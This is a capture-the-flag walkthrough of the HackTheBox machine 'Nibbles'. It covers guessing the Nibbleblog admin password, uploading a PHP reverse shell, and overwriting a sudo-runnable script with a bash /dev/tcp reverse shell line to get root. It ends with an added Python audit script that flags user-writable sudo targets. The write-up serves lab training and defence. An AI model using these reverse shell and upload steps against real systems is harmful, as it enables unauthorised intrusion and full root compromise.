
Nibbles - HackTheBox Walkthrough

Hello guys, welcome back to another walkthrough. This time we’ll be doing Nibbles, a HackTheBox machine rated easy. Without further ado, let’s begin.

Recon

Nmap Scan

As always, we’ll start with an Nmap scan to discover the open ports and services.

$ cat nmap-scan
# Nmap 7.91 scan initiated Fri Oct  8 19:28:34 2021 as: nmap -sC -sV -v -oN nmap-scan 10.129.232.219
Increasing send delay for 10.129.232.219 from 0 to 5 due to 56 out of 185 dropped probes since last increase.
Nmap scan report for 10.129.232.219
Host is up (0.12s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Oct  8 19:29:10 2021 -- 1 IP address (1 host up) scanned in 35.66 seconds

Two ports are open: 22 (SSH) and 80 (HTTP).

HTTP Enumeration


The website shows only a message, ‘Hello World!’, but the interesting thing is a comment in the source code that reveals a directory, /nibbleblog.


This site appears to be powered by Nibbleblog.


It is vulnerable to an arbitrary file upload, but exploiting it requires credentials. The login page is at /admin.php. I tried ‘admin/admin’, ‘admin/password’ and ‘admin/machine’s name’, which in this case is nibbles.

User     Password
admin    nibbles


Initial Foothold

We can find a PHP reverse shell at /usr/share/webshells/php/php-reverse-shell.php. Let’s configure it by changing the IP address and the listener port; once that’s done, just upload the file.


Start a netcat listener on port 443, and click on image.php to get a shell.


For an interactive shell, run these commands:

$ python -c 'import pty; pty.spawn("/bin/bash")'
$ ^Z
$ stty raw -echo; fg
$ reset
$ export TERM=xterm
$ export SHELL=bash

In nibbler’s home directory there is a zip file.


Privilege Escalation

Unzipping this file creates the script personal/stuff/monitor.sh.


sudo -l shows that we can execute this script as root without a password.


Since we own this file, we can overwrite it, and whatever it contains will run as root through sudo, so we insert a reverse shell into it.

$ echo '#!/bin/bash' > monitor.sh
$ echo 'bash -i >& /dev/tcp/10.10.14.39/443 0>&1' >> monitor.sh
$ sudo /home/nibbler/personal/stuff/monitor.sh


We just need a netcat listener on port 443 to get the shell.
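Seen from the defender's side, the root cause is a sudo rule whose target sits in a path the unprivileged user owns. The audit below is an added example, not part of the original walkthrough: it pulls command paths out of `sudo -l` output and reports every path component that a non-root user owns or can write. The sample output, the host name in it, and the function names are constructed for illustration.

```python
import os
import re
import stat

# Constructed `sudo -l` output modelled on the rule described above.
SAMPLE_SUDO_L = """\
User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
"""

def sudo_commands(sudo_l_output):
    """Return the absolute command paths listed in `sudo -l` rule lines."""
    commands = []
    for line in sudo_l_output.splitlines():
        rule = re.match(r"\s*\([^)]*\)\s*(.+)", line)  # "(runas) TAG: cmd, cmd"
        if not rule:
            continue
        for entry in rule.group(1).split(","):
            entry = re.sub(r"^\s*(?:[A-Z_]+:\s*)+", "", entry)  # drop NOPASSWD: etc.
            words = entry.split()
            if words and words[0].startswith("/"):
                commands.append(words[0])
    return commands

def tamper_findings(path, trusted_uids=(0,), top="/"):
    """Reasons an untrusted user could change what `path` runs.

    Checks the file and every ancestor directory up to `top`. Conservative:
    sticky-bit directories such as /tmp are still reported.
    """
    findings = []
    current, top = os.path.abspath(path), os.path.abspath(top)
    while True:
        try:
            st = os.lstat(current)
        except FileNotFoundError:
            findings.append(f"{current}: missing, whoever can write the parent can create it")
        else:
            if st.st_uid not in trusted_uids:
                findings.append(f"{current}: owned by uid {st.st_uid}")
            if not stat.S_ISLNK(st.st_mode) and st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append(f"{current}: group- or world-writable")
        if current == top or current == os.path.dirname(current):
            break
        current = os.path.dirname(current)
    return findings

if __name__ == "__main__":
    for cmd in sudo_commands(SAMPLE_SUDO_L):
        for finding in tamper_findings(cmd):
            print(f"sudo target {cmd}: {finding}")
```

Any finding on a sudo target means the rule should point at a root-owned file in a root-owned directory tree instead.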


Now we can read the flag. That’s it for now guys. Until next time.

This post is licensed under CC BY 4.0 by the author.